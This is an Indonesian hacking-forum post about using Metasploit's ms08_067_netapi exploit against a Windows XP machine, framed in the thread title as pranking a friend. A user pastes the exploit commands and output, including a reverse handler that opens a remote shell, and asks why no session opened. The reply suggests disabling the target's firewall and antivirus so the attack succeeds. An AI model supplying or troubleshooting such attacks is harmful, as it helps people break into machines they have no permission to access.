Exploit Windows ga pake Backdoor + ngerjain temen
#15
Quote:kok punya ku jawabannya gini ya?
msf exploit(ms08_067_netapi) > set RHOST 10.10.19.10
RHOST => 10.10.19.10
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.19.75:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
mohon bantuannya yah

coba matiin firewall n antivirus target pasti bisa Big Grin


Messages In This Thread
RE: Exploit Windows ga pake Backdoor + ngerjain temen - by iKONspirasi - 02-07-2012, 11:53 AM




Users browsing this thread: 2 Guest(s)